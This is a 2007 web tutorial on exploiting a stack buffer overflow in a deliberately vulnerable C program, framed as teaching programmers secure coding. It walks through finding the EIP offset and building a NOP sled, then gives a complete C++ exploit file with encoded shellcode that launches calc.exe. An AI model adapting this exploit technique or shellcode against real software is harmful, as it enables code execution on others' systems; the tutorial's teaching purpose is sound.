PhoenixBit Software Solutions .:[Tutorials]:.

News

General

Tutorials

Products

Gallery

Forum

About

Tutorials

GamerTheGreat.com - The Best Flash Games/Animations Portal for Great Gamers. Are you Great enough?

Buffer Overflow In Action Tutorial - Part 2

By VirusFree

Tutorial Description :	This tutorial will show you how to buffer overflow programs in order to change the flow of the application , even if this means executing your own code. This is the part one where i show you how to change the flow of the program TO EXECUTE your own code , plus i give you all the code and the compiled ones ( in case you don't have a compiler ) and a video demonstration/tutorial

Who should read this :	Anyone who is interested in computers should read this. Tutorials about security are not meant for hackers.. their actually meant for the programmers ( and anyone else who likes computers ) so when they create a program they will know what to do in order to avoid stuff like buffer overflows , SQL (or anything else ) injections , XSS, Remote file inclusions etc... A programmer that actually knows this stuff can create a FAR more secure and stable application than the ones that don't and i find it very stupid for some programmer saying that he doesn't need to know this.

What is a buffer overflow?	Buffer overflow is when you try to put data into an array.. but the data are more than the array size. The problem occurs when you don't properly check the bounds of the array. So when you write data in the array it comes a time that the array ends... but you keep writing data in the memory next to the array, thus overwriting anything else that was there before.

Why can someone exploit a buffer overflow problem ?	when overwrite the memory data that are out of the array you can overwrite critical for the application information, like the EIP. EIP (Instruction Pointer) holds the return address so when the function ends, it while find a ret instruction which will put the program counter at the value in which EIP is holding. So i you can change that value you can change the program flow and make it execute something else.

What do you need :	For this tutorial you will need : - OllyDbg : A great debugger - Bloodshed Dev-C++ : A C/C++ Compiler / Visual Studio - Time , patience , brain and the will to learn

Ok, let's start...

A Buffer overflow occurs when you try to write data into an array which is smaller than the amount of data you are trying to
write into, thus overwriting what is after the buffer in the memory.

I will not explain here how the memory structure is when a program/function is executed.
I will just show you how to exploit it :o)

Let's see a vulnerable program ( vuln.c )

#include <stdio.h>
#include <string.h>

int ReadaFile(char*,char*,int);

int VulnFunction(char *cptr){

        //create a local buffer
       char LocalBuffer[300] = "File Data : ";

        //copy buffer to local buffer - this is the vulnerable command
       strcpy(LocalBuffer+12,cptr);

        //print local buffer
       printf("%s\n\n\n",LocalBuffer);

       return 0;
}

int main(){

       char buf[1000];
       char FileName[] = "My_Input_File.txt";

        //Read a file ( My_Input_File.txt )
       ReadaFile(buf,FileName,1000);

        //pass the buffer to the vulnerable function
       VulnFunction(buf);

       system("Pause");

       return 0;
}

//the function bellow is to read the file and write it in the buffer
int ReadaFile(char *buffer,char *Fname,int Limit){

       int c;
       int n=0;

       FILE *f;
       f = fopen(Fname,"r");

       while((c=getc(f))!=EOF)
       {
               if (n<Limit){
               buffer[n++] = c;
       }
       }
       buffer[n++] = 0;

        fclose(f);

       return 0;
}

The program above has a problem when strcpy(LocalBuffer+12,cptr)will be executed with the length
of the cptr more than 300 ( array size )

What I am going to show you in this tutorial is how to change the flow of the program and execute you OWN shellcode, thus
allowing you to do whatever the program had access to do.

Don't forget to see the Video Demonstration to understand it better...

First we try to crash the program in order to confirm that the buffer overflow does exist.

To do that we run the vuln.exe and put it then filename a lot of A's

AAAAAAAAAAAA .... 500 A's

This is what we get :

Now the new return address is 41414141 ... which is A ( A is number 65 in ascii and number 65 is 41 in hex)

So what we did is to change the return address to 41414141 which doesn't exist so windows gives as an error.

What we need to do now is to change that address and make it point to our shellcode.. but first...

Ok we need to find how many bytes are from the start of the buffer until the actual EIP

To do that we must create a long string with random characters... try not repeating a sequence in the characters so the

four characters you will get when the program crashes will be a unique sequence in the string so you can find the easily...

From experience a good way to create a string is using hash algorithms..

I have an online tool that can calculate the hash results for a string using several algorithms..
click here to go to the Online Hash Calculator page

I made this string :

F79E002AC163078C673FA2C321E5E66F5A105E8B9D40E1329780D62EA2265D8AB444AC06613FC8D63
795BE9AD0BEAF55011936AC812A635DAA90E1F2D19541156FEE9DF8AD0234829205B9033196BA818F
7A872B109F4B3C50D7B0DF729D299BC6F8E9EF9066971FCD23914BE346F8D20DA217890915809C8AD
8757BAA8564DC136C1E07507F4A983EBFA301DC59196F18593C45E519287A23297589221E3030CAE47
D097FC191F5ADF01AA4

the above string is 344 characters

So what we need to do now is to write the above string in the file and run the vuln.exe

Ok we got 39323332 as the new EIP... now we must first fix it ( now it's in Little Endian format )

So 39 32 33 32 .. becomes 32 33 32 39

Now we find what is the ascii character that each hex number represents

To do this you can go to my ASCII - HEX - Unicode Online Converter Tool and put in the hex field the
above numbers with a % in front of each one of them... like this %32%33%32%39 and click 'Decode Hex to Ascii'

So 32 33 32 39 is the string '2329' in ascii... now we search for that string in the big string we put for arguments before...

ok now we will not need anything after the '2329' so we discard it.. and the string becomes

|<-------------------------------------- 304 bytes ---------------------------------->|<-- 2329--->|

In the string above.. if is put in the file for the vuln.exe program, it will overwrite the buffer and replace
the EIP with the valuethat is found after the first 304 bytes...

so now we now we have 304 bytes of maximum size for our shellcode...

now we must create a program that can generate a file that when read by vuln.exe will cause our shellcode to be executed

the shell code i chose will run calc.exe when executed.. you can find it from metaploit site...

see the video tutorial for more information and how to generate your own shellcode...

After you have your shellcode you must calculate how much space is not used by the shellcode and fill it with Nop's.
NOP is an instruction that does absolutely nothing, so you can reroute the program flow to where the nops are in
memory.. and they will get executed ( so nothing will happen ) until the shellcode that will be right after them get's executed.
the reason for doing this is that you can't put anything else there unless you are 100% certain that you can hit the exact first
byte of the shellcode (by changing EIP ) .. this might be hard to do something with dynamic memory allocation and the
memory moves around... so if you get to hit one of the NOP's in the buffer it will be ok.. also it's easier to find the NOPs
in memory... you will understand why when you see the video tutorial...

Now you debug the vuln.exe using OllyDbg and try to find where those NOP are... and get that address and use it in the
exploit code as the new EIP...

(Video Tutorial for how to do that )

And now we write the exploit...

I wrote the exploit in C++...

Here is the code of the exploit ( exploit.cpp )

#include <iostream>
#include <fstream>

using namespace std;

int main(){

          //our shellcode ... which runs calc.exe
         unsigned char scode[] = "\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf5"
                                                "\x3a\x5d\x2f\x83\xeb\xfc\xe2\xf4\x09\xd2\x19\x2f\xf5\x3a\xd6\x6a"
                                                "\xc9\xb1\x21\x2a\x8d\x3b\xb2\xa4\xba\x22\xd6\x70\xd5\x3b\xb6\x66"
                                                "\x7e\x0e\xd6\x2e\x1b\x0b\x9d\xb6\x59\xbe\x9d\x5b\xf2\xfb\x97\x22"
                                                "\xf4\xf8\xb6\xdb\xce\x6e\x79\x2b\x80\xdf\xd6\x70\xd1\x3b\xb6\x49"
                                                "\x7e\x36\x16\xa4\xaa\x26\x5c\xc4\x7e\x26\xd6\x2e\x1e\xb3\x01\x0b"
                                                "\xf1\xf9\x6c\xef\x91\xb1\x1d\x1f\x70\xfa\x25\x23\x7e\x7a\x51\xa4"
                                                "\x85\x26\xf0\xa4\x9d\x32\xb6\x26\x7e\xba\xed\x2f\xf5\x3a\xd6\x47"
                                                "\xc9\x65\x6c\xd9\x95\x6c\xd4\xd7\x76\xfa\x26\x7f\x9d\xca\xd7\x2b"
                                                "\xaa\x52\xc5\xd1\x7f\x34\x0a\xd0\x12\x59\x3c\x43\x96\x14\x38\x57"
                                                "\x90\x3a\x5d\x2f";

          //nops to fill the buffer
         char Nops[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                                  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                                 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                                 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                                 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                                 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                                 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                                 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                                 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                                 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                                 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                                 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                                 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                                 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

          //the address where sheelcode is in memory
         char EvilEIP[] = "\xB0\xFB\x23\x00";

         cout << "Building Exploit....";

         ofstream myFile;

         myFile.open("My_Input_File.txt");//open file

         myFile << Nops << scode << EvilEIP; //write evil strings

         myFile.close();//close file

         cout << "Finished!\n\n\n\n\n";

return 0;
}

So we run the exploit code and the result :

Program flow successfully changes , our shellcode gets executed and calculator pops up !!!

I recommend that you see the Video demonstration so you can get a better idea how to do the tutorial above...

Click Here to see the VIDEO DEMONSTRATION/TUTORIAL

Download tutorial source files

This tutorial was written by VirusFree.

This is the PART 2 of the tutorial

Thank you for reading it and please excuse my English

For any problems or question please don't hesitate to post them in our forums
and i ( or anyone else who can answer them ) will reply as soon as possible

Comments

	VirusFree - 3/20/2007 12:07:59 AM


	Post here any comments about the tutorial

Post Comment
You need to be a registered user to post a comment

Your Comment :

Your post may only
contain the [url],[img]
[quote] tags and smiles.

Syntax :
[url]address[/url]
[url=address]anchor[/url]
[img]address[/img]
[quote="nick"]text[/quote]

Tags : software, computer security , software developers , software programming , freeware programs , online games